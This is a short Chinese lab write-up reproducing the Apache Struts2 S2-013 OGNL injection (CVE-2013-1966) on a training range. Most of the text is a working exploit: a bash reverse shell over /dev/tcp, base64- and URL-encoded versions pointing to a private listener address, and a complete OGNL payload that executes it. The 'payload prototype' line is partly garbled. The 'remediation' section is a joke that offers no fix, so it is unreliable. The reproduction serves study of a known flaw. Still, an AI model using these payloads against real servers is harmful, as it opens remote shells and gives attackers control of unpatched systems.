[漏洞复现]Apache Struts2/S2-013 （CVE-2013-1966）

一、漏洞情况分析

2.3.14.2 之前的 Apache Struts 2 允许远程攻击者通过在 (1) URL 或 (2) A 标签中使用 includeParams 属性时未正确处理的特制请求执行任意 OGNL 代码。

二、漏洞复现

春秋云境.com

进入靶场

开始复现

 bash -i >& /dev/tcp/127.0.0.1/9999 0>&1
 base加密
 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}
 url编码
 bash+-c+%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D

 /?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27bash+-c+%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%27%29.getInputStream%28%29%2C%23b%3Dnew+java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew+java.io.BufferedReader%28%23b%29%2C%23d%3Dnew+char%5B50000%5D%2C%23c.read%28%23d%29%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2C%23out.println%28new+java.lang.String%28%23d%29%29%2C%23out.close%28%29%7D
 ​
 payload原型：
 /?a=${#_memberAccess["allowStaticMethodAccess"]=true,#[email protected]@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#[email protected]@getResponse().getWriter(),#out.println(new java.lang.String(#d)),#out.close()}

 api接入构造好的payload开启监听后执行

三、漏洞处置建议 

把靶场关了，跟漏洞说“白白吧”